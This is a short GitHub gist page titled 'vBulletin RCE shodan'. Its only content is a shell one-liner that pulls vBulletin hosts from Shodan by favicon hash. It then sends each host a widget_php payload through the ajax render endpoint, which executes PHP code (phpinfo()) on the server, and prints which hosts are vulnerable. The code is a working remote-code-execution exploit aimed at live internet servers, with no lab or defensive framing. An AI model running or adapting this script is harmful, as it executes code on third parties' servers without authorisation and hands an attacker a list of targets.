Skip to content

Instantly share code, notes, and snippets.

@sherlocksecurity
Forked from Mad-robot/vBulletin RCE shodan
Created August 11, 2020 23:16
Show Gist options
  • Save sherlocksecurity/09faf6f0556dcba4a3f9b05a306efd2f to your computer and use it in GitHub Desktop.
Save sherlocksecurity/09faf6f0556dcba4a3f9b05a306efd2f to your computer and use it in GitHub Desktop.
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment